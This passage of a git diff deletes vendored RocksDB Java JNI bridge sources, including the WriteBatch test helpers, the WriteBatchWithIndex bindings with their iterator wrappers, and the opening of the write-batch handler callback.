-/*
- * Class:     org_rocksdb_WriteBatch_Handler
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatch_00024Handler_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* wbjnic =
-      reinterpret_cast<rocksdb::WriteBatchHandlerJniCallback*>(handle);
-  assert(wbjnic != nullptr);
-  delete wbjnic;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/write_batch_test.cc b/thirdparty/rocksdb/java/rocksjni/write_batch_test.cc
deleted file mode 100644
index 199ad23..0000000
--- a/thirdparty/rocksdb/java/rocksjni/write_batch_test.cc
+++ /dev/null
@@ -1,161 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::WriteBatch methods testing from Java side.
-#include <memory>
-
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "include/org_rocksdb_WriteBatch.h"
-#include "include/org_rocksdb_WriteBatchTest.h"
-#include "include/org_rocksdb_WriteBatchTestInternalHelper.h"
-#include "include/org_rocksdb_WriteBatch_Handler.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "rocksjni/portal.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-
-/*
- * Class:     org_rocksdb_WriteBatchTest
- * Method:    getContents
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchTest_getContents(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle) {
-  auto* b = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(b != nullptr);
-
-  // todo: Currently the following code is directly copied from
-  // db/write_bench_test.cc.  It could be implemented in java once
-  // all the necessary components can be accessed via jni api.
-
-  rocksdb::InternalKeyComparator cmp(rocksdb::BytewiseComparator());
-  auto factory = std::make_shared<rocksdb::SkipListFactory>();
-  rocksdb::Options options;
-  rocksdb::WriteBufferManager wb(options.db_write_buffer_size);
-  options.memtable_factory = factory;
-  rocksdb::MemTable* mem = new rocksdb::MemTable(
-      cmp, rocksdb::ImmutableCFOptions(options),
-      rocksdb::MutableCFOptions(options), &wb, rocksdb::kMaxSequenceNumber,
-      0 /* column_family_id */);
-  mem->Ref();
-  std::string state;
-  rocksdb::ColumnFamilyMemTablesDefault cf_mems_default(mem);
-  rocksdb::Status s =
-      rocksdb::WriteBatchInternal::InsertInto(b, &cf_mems_default, nullptr);
-  int count = 0;
-  rocksdb::Arena arena;
-  rocksdb::ScopedArenaIterator iter(mem->NewIterator(
-      rocksdb::ReadOptions(), &arena));
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    rocksdb::ParsedInternalKey ikey;
-    ikey.clear();
-    bool parsed = rocksdb::ParseInternalKey(iter->key(), &ikey);
-    if (!parsed) {
-      assert(parsed);
-    }
-    switch (ikey.type) {
-      case rocksdb::kTypeValue:
-        state.append("Put(");
-        state.append(ikey.user_key.ToString());
-        state.append(", ");
-        state.append(iter->value().ToString());
-        state.append(")");
-        count++;
-        break;
-      case rocksdb::kTypeMerge:
-        state.append("Merge(");
-        state.append(ikey.user_key.ToString());
-        state.append(", ");
-        state.append(iter->value().ToString());
-        state.append(")");
-        count++;
-        break;
-      case rocksdb::kTypeDeletion:
-        state.append("Delete(");
-        state.append(ikey.user_key.ToString());
-        state.append(")");
-        count++;
-        break;
-      default:
-        assert(false);
-        break;
-    }
-    state.append("@");
-    state.append(rocksdb::NumberToString(ikey.sequence));
-  }
-  if (!s.ok()) {
-    state.append(s.ToString());
-  } else if (count != rocksdb::WriteBatchInternal::Count(b)) {
-    state.append("CountMismatch()");
-  }
-  delete mem->Unref();
-
-  jbyteArray jstate = env->NewByteArray(static_cast<jsize>(state.size()));
-  if(jstate == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  env->SetByteArrayRegion(jstate, 0, static_cast<jsize>(state.size()),
-                          const_cast<jbyte*>(reinterpret_cast<const jbyte*>(state.c_str())));
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    env->DeleteLocalRef(jstate);
-    return nullptr;
-  }
-
-  return jstate;
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchTestInternalHelper
- * Method:    setSequence
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_WriteBatchTestInternalHelper_setSequence(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle, jlong jsn) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  rocksdb::WriteBatchInternal::SetSequence(
-      wb, static_cast<rocksdb::SequenceNumber>(jsn));
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchTestInternalHelper
- * Method:    sequence
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_WriteBatchTestInternalHelper_sequence(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle) {
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-  assert(wb != nullptr);
-
-  return static_cast<jlong>(rocksdb::WriteBatchInternal::Sequence(wb));
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchTestInternalHelper
- * Method:    append
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_WriteBatchTestInternalHelper_append(
-    JNIEnv* env, jclass jclazz, jlong jwb_handle_1, jlong jwb_handle_2) {
-  auto* wb1 = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle_1);
-  assert(wb1 != nullptr);
-  auto* wb2 = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle_2);
-  assert(wb2 != nullptr);
-
-  rocksdb::WriteBatchInternal::Append(wb1, wb2);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/write_batch_with_index.cc b/thirdparty/rocksdb/java/rocksjni/write_batch_with_index.cc
deleted file mode 100644
index 53f2a11..0000000
--- a/thirdparty/rocksdb/java/rocksjni/write_batch_with_index.cc
+++ /dev/null
@@ -1,582 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::WriteBatchWithIndex methods from Java side.
-
-#include "include/org_rocksdb_WBWIRocksIterator.h"
-#include "include/org_rocksdb_WriteBatchWithIndex.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    newWriteBatchWithIndex
- * Signature: ()J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_newWriteBatchWithIndex__(
-    JNIEnv* env, jclass jcls) {
-  auto* wbwi = new rocksdb::WriteBatchWithIndex();
-  return reinterpret_cast<jlong>(wbwi);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    newWriteBatchWithIndex
- * Signature: (Z)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_newWriteBatchWithIndex__Z(
-    JNIEnv* env, jclass jcls, jboolean joverwrite_key) {
-  auto* wbwi =
-      new rocksdb::WriteBatchWithIndex(rocksdb::BytewiseComparator(), 0,
-          static_cast<bool>(joverwrite_key));
-  return reinterpret_cast<jlong>(wbwi);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    newWriteBatchWithIndex
- * Signature: (JIZ)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_newWriteBatchWithIndex__JIZ(
-    JNIEnv* env, jclass jcls, jlong jfallback_index_comparator_handle,
-    jint jreserved_bytes, jboolean joverwrite_key) {
-  auto* wbwi =
-      new rocksdb::WriteBatchWithIndex(
-          reinterpret_cast<rocksdb::Comparator*>(jfallback_index_comparator_handle),
-          static_cast<size_t>(jreserved_bytes), static_cast<bool>(joverwrite_key));
-  return reinterpret_cast<jlong>(wbwi);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    count0
- * Signature: (J)I
- */
-jint Java_org_rocksdb_WriteBatchWithIndex_count0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  return static_cast<jint>(wbwi->GetWriteBatch()->Count());
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    put
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_put__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto put = [&wbwi] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Put(key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    put
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_put__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len,
-    jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto put = [&wbwi, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Put(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(put, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    merge
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_merge__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto merge = [&wbwi] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Merge(key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    merge
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_merge__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jbyteArray jentry_value, jint jentry_value_len,
-    jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto merge = [&wbwi, &cf_handle] (rocksdb::Slice key, rocksdb::Slice value) {
-    wbwi->Merge(cf_handle, key, value);
-  };
-  rocksdb::JniUtil::kv_op(merge, env, jobj, jkey, jkey_len, jentry_value,
-      jentry_value_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    remove
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_remove__J_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto remove = [&wbwi] (rocksdb::Slice key) {
-    wbwi->Delete(key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    remove
- * Signature: (J[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_remove__J_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jkey,
-    jint jkey_len, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto remove = [&wbwi, &cf_handle] (rocksdb::Slice key) {
-    wbwi->Delete(cf_handle, key);
-  };
-  rocksdb::JniUtil::k_op(remove, env, jobj, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    deleteRange
- * Signature: (J[BI[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_deleteRange__J_3BI_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto deleteRange = [&wbwi](rocksdb::Slice beginKey, rocksdb::Slice endKey) {
-    wbwi->DeleteRange(beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    deleteRange
- * Signature: (J[BI[BIJ)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_deleteRange__J_3BI_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jbegin_key,
-    jint jbegin_key_len, jbyteArray jend_key, jint jend_key_len,
-    jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  assert(cf_handle != nullptr);
-  auto deleteRange = [&wbwi, &cf_handle](rocksdb::Slice beginKey,
-                                         rocksdb::Slice endKey) {
-    wbwi->DeleteRange(cf_handle, beginKey, endKey);
-  };
-  rocksdb::JniUtil::kv_op(deleteRange, env, jobj, jbegin_key, jbegin_key_len,
-                          jend_key, jend_key_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    putLogData
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_putLogData(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jbyteArray jblob,
-    jint jblob_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-  auto putLogData = [&wbwi] (rocksdb::Slice blob) {
-    wbwi->PutLogData(blob);
-  };
-  rocksdb::JniUtil::k_op(putLogData, env, jobj, jblob, jblob_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    clear
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_clear0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  wbwi->Clear();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    setSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_setSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  wbwi->SetSavePoint();
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    rollbackToSavePoint0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_rollbackToSavePoint0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  assert(wbwi != nullptr);
-
-  auto s = wbwi->RollbackToSavePoint();
-
-  if (s.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    iterator0
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_iterator0(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* wbwi_iterator = wbwi->NewIterator();
-  return reinterpret_cast<jlong>(wbwi_iterator);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    iterator1
- * Signature: (JJ)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_iterator1(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* wbwi_iterator = wbwi->NewIterator(cf_handle);
-  return reinterpret_cast<jlong>(wbwi_iterator);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    iteratorWithBase
- * Signature: (JJJ)J
- */
-jlong Java_org_rocksdb_WriteBatchWithIndex_iteratorWithBase(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jcf_handle,
-    jlong jbi_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  auto* base_iterator = reinterpret_cast<rocksdb::Iterator*>(jbi_handle);
-  auto* iterator = wbwi->NewIteratorWithBase(cf_handle, base_iterator);
-  return reinterpret_cast<jlong>(iterator);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatch
- * Signature: (JJ[BI)[B
- */
-jbyteArray JNICALL Java_org_rocksdb_WriteBatchWithIndex_getFromBatch__JJ_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdbopt_handle,
-    jbyteArray jkey, jint jkey_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* dbopt = reinterpret_cast<rocksdb::DBOptions*>(jdbopt_handle);
-
-  auto getter = [&wbwi, &dbopt](const rocksdb::Slice& key, std::string* value) {
-    return wbwi->GetFromBatch(*dbopt, key, value);
-  };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatch
- * Signature: (JJ[BIJ)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchWithIndex_getFromBatch__JJ_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdbopt_handle,
-    jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* dbopt = reinterpret_cast<rocksdb::DBOptions*>(jdbopt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-
-  auto getter =
-      [&wbwi, &cf_handle, &dbopt](const rocksdb::Slice& key,
-                                  std::string* value) {
-        return wbwi->GetFromBatch(cf_handle, *dbopt, key, value);
-      };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatchAndDB
- * Signature: (JJJ[BI)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchWithIndex_getFromBatchAndDB__JJJ_3BI(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdb_handle,
-    jlong jreadopt_handle, jbyteArray jkey, jint jkey_len) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* readopt = reinterpret_cast<rocksdb::ReadOptions*>(jreadopt_handle);
-
-  auto getter =
-      [&wbwi, &db, &readopt](const rocksdb::Slice& key, std::string* value) {
-        return wbwi->GetFromBatchAndDB(db, *readopt, key, value);
-      };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    getFromBatchAndDB
- * Signature: (JJJ[BIJ)[B
- */
-jbyteArray Java_org_rocksdb_WriteBatchWithIndex_getFromBatchAndDB__JJJ_3BIJ(
-    JNIEnv* env, jobject jobj, jlong jwbwi_handle, jlong jdb_handle,
-    jlong jreadopt_handle, jbyteArray jkey, jint jkey_len, jlong jcf_handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* readopt = reinterpret_cast<rocksdb::ReadOptions*>(jreadopt_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-
-  auto getter =
-      [&wbwi, &db, &cf_handle, &readopt](const rocksdb::Slice& key,
-                                         std::string* value) {
-        return wbwi->GetFromBatchAndDB(db, *readopt, cf_handle, key, value);
-      };
-
-  return rocksdb::JniUtil::v_op(getter, env, jkey, jkey_len);
-}
-
-/*
- * Class:     org_rocksdb_WriteBatchWithIndex
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WriteBatchWithIndex_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(handle);
-  assert(wbwi != nullptr);
-  delete wbwi;
-}
-
-/* WBWIRocksIterator below */
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  assert(it != nullptr);
-  delete it;
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    isValid0
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_WBWIRocksIterator_isValid0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<rocksdb::WBWIIterator*>(handle)->Valid();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    seekToFirst0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_seekToFirst0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->SeekToFirst();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    seekToLast0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_seekToLast0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->SeekToLast();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    next0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_next0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->Next();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    prev0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_prev0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  reinterpret_cast<rocksdb::WBWIIterator*>(handle)->Prev();
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    seek0
- * Signature: (J[BI)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_seek0(
-    JNIEnv* env, jobject jobj, jlong handle, jbyteArray jtarget,
-    jint jtarget_len) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  jbyte* target = env->GetByteArrayElements(jtarget, nullptr);
-  if(target == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  rocksdb::Slice target_slice(
-      reinterpret_cast<char*>(target), jtarget_len);
-
-  it->Seek(target_slice);
-
-  env->ReleaseByteArrayElements(jtarget, target, JNI_ABORT);
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    status0
- * Signature: (J)V
- */
-void Java_org_rocksdb_WBWIRocksIterator_status0(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  rocksdb::Status s = it->status();
-
-  if (s.ok()) {
-    return;
-  }
-
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-}
-
-/*
- * Class:     org_rocksdb_WBWIRocksIterator
- * Method:    entry1
- * Signature: (J)[J
- */
-jlongArray Java_org_rocksdb_WBWIRocksIterator_entry1(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  auto* it = reinterpret_cast<rocksdb::WBWIIterator*>(handle);
-  const rocksdb::WriteEntry& we = it->Entry();
-
-  jlong results[3];
-
-  //set the type of the write entry
-  switch (we.type) {
-    case rocksdb::kPutRecord:
-      results[0] = 0x1;
-      break;
-
-    case rocksdb::kMergeRecord:
-      results[0] = 0x2;
-      break;
-
-    case rocksdb::kDeleteRecord:
-      results[0] = 0x4;
-      break;
-
-    case rocksdb::kLogDataRecord:
-      results[0] = 0x8;
-      break;
-
-    default:
-      results[0] = 0x0;
-  }
-
-  // key_slice and value_slice will be freed by org.rocksdb.DirectSlice#close
-
-  auto* key_slice = new rocksdb::Slice(we.key.data(), we.key.size());
-  results[1] = reinterpret_cast<jlong>(key_slice);
-  if (we.type == rocksdb::kDeleteRecord
-      || we.type == rocksdb::kLogDataRecord) {
-    // set native handle of value slice to null if no value available
-    results[2] = 0;
-  } else {
-    auto* value_slice = new rocksdb::Slice(we.value.data(), we.value.size());
-    results[2] = reinterpret_cast<jlong>(value_slice);
-  }
-
-  jlongArray jresults = env->NewLongArray(3);
-  if(jresults == nullptr) {
-    // exception thrown: OutOfMemoryError
-    if(results[2] != 0) {
-      auto* value_slice = reinterpret_cast<rocksdb::Slice*>(results[2]);
-      delete value_slice;
-    }
-    delete key_slice;
-    return nullptr;
-  }
-
-  env->SetLongArrayRegion(jresults, 0, 3, results);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    env->DeleteLocalRef(jresults);
-    if(results[2] != 0) {
-      auto* value_slice = reinterpret_cast<rocksdb::Slice*>(results[2]);
-      delete value_slice;
-    }
-    delete key_slice;
-    return nullptr;
-  }
-
-  return jresults;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.cc b/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.cc
deleted file mode 100644
index 0f00766..0000000
--- a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.cc
+++ /dev/null
@@ -1,306 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::Comparator.
-
-#include "rocksjni/writebatchhandlerjnicallback.h"
-#include "rocksjni/portal.h"
-
-namespace rocksdb {
-WriteBatchHandlerJniCallback::WriteBatchHandlerJniCallback(
-    JNIEnv* env, jobject jWriteBatchHandler)
-    : m_env(env) {
-
-  // Note: we want to access the Java WriteBatchHandler instance
-  // across multiple method calls, so we create a global ref
-  assert(jWriteBatchHandler != nullptr);
-  m_jWriteBatchHandler = env->NewGlobalRef(jWriteBatchHandler);
-  if(m_jWriteBatchHandler == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  m_jPutMethodId = WriteBatchHandlerJni::getPutMethodId(env);
-  if(m_jPutMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jMergeMethodId = WriteBatchHandlerJni::getMergeMethodId(env);
-  if(m_jMergeMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jDeleteMethodId = WriteBatchHandlerJni::getDeleteMethodId(env);
-  if(m_jDeleteMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jDeleteRangeMethodId = WriteBatchHandlerJni::getDeleteRangeMethodId(env);
-  if (m_jDeleteRangeMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
